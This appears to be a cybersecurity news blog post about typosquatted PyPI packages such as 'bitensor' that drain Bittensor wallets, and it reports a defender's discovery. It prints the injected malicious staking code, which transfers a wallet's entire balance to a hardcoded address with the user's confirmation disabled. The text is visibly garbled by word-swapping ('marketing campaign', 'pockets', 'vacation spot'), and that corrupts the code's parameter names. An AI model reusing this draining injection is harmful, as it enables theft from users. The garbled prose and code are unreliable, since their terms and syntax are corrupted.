Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

Posted on August 9, 2025August 9, 2025 By CWS

A classy cryptocurrency theft marketing campaign has emerged concentrating on the Bittensor ecosystem by way of malicious Python packages distributed through the Python Package deal Index (PyPI).

The assault leverages typosquatting methods to deceive builders and customers into putting in compromised variations of professional Bittensor packages, finally leading to full pockets drainage throughout routine staking operations.

The malicious marketing campaign was orchestrated with precision, with all 5 typosquatted packages printed inside a concentrated 25-minute window on August 6, 2025.

These packages included variations similar to “bitensor” (lacking ‘t’), “bittenso” (truncated), and “qbittensor” (prefixed), all designed to imitate the genuine bittensor and bittensor-cli packages.

The attackers strategically selected model numbers 9.9.4 and 9.9.5 to carefully match professional package deal variations, maximizing the chance of unintentional set up by way of developer typos or copy-paste errors.

GitLab analysts recognized the menace by way of their automated package deal monitoring system, which flagged suspicious exercise associated to fashionable Bittensor packages.

The invention revealed a rigorously engineered assault that exploits the belief inherent in routine blockchain operations, particularly concentrating on customers engaged in staking actions who usually possess substantial cryptocurrency holdings.

Evaluation of the Hijacked Staking Mechanism

The assault’s technical sophistication lies in its surgical modification of professional staking performance inside the stake_extrinsic perform positioned in bittensor_cli/src/instructions/stake/add.py.

At line 275, the attackers inserted malicious code that fully subverts the anticipated staking course of:-

consequence = await transfer_extrinsic(
subtensor=subtensor,
pockets=pockets,
vacation spot=”5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR”,
quantity=quantity,
transfer_all=True,
immediate=False
)

This code injection operates with devastating effectivity by setting transfer_all=True to empty complete wallets moderately than simply the supposed staking quantity, whereas immediate=False bypasses person affirmation dialogs.

The hardcoded vacation spot pockets deal with serves as a set level for stolen funds, that are subsequently distributed by way of a multi-hop laundering community involving a number of middleman wallets earlier than reaching the ultimate consolidation deal with.

Equip your SOC with full entry to the most recent menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial

Cyber Security News Tags:Actors, Bittensor, Cryptocurrency, Packages, PyPI, Steal, Threat, Typosquatted, Wallets

Post navigation

Previous Post: Huge Wave of Malicious Efimer Malicious Script Attack Users via WordPress Sites, Malicious Torrents, and Email
Next Post: New Linux Kernel Vulnerability Directly Exploited from Chrome Renderer Sandbox

Related Posts

Google Patches 79 Chrome Security Flaws, 14 Critical Google Patches 79 Chrome Security Flaws, 14 Critical Cyber Security News
Hackers Using New ClickFix Technique To Exploits Human Error Via Fake Prompts Hackers Using New ClickFix Technique To Exploits Human Error Via Fake Prompts Cyber Security News
FBI Warns of Hackers Altering Photos Found on Social Media to Use as Fake Proof FBI Warns of Hackers Altering Photos Found on Social Media to Use as Fake Proof Cyber Security News
Chrome 151 Update Fixes Critical Security Vulnerabilities Chrome 151 Update Fixes Critical Security Vulnerabilities Cyber Security News
Node.js-Powered LTX Stealer Targets User Credentials Node.js-Powered LTX Stealer Targets User Credentials Cyber Security News
Cyber Threats Targeting Australia and New Zealand Fueled by Initial Access Sales, and Ransomware Campaigns Cyber Threats Targeting Australia and New Zealand Fueled by Initial Access Sales, and Ransomware Campaigns Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • F-Droid 2.0 Debuts with Major Redesign for App Discovery
  • China and US to Create AI Safety Channel Amid Ongoing Talks
  • Lunex Stealer Exploits AMD Driver for Credential Theft
  • Local AI Model Evades EDR Detection with Modified Credential Dumper
  • Enhancing AI Agent Security with Zero Trust Principles

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2026
  • August 2026
  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • F-Droid 2.0 Debuts with Major Redesign for App Discovery
  • China and US to Create AI Safety Channel Amid Ongoing Talks
  • Lunex Stealer Exploits AMD Driver for Credential Theft
  • Local AI Model Evades EDR Detection with Modified Credential Dumper
  • Enhancing AI Agent Security with Zero Trust Principles

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark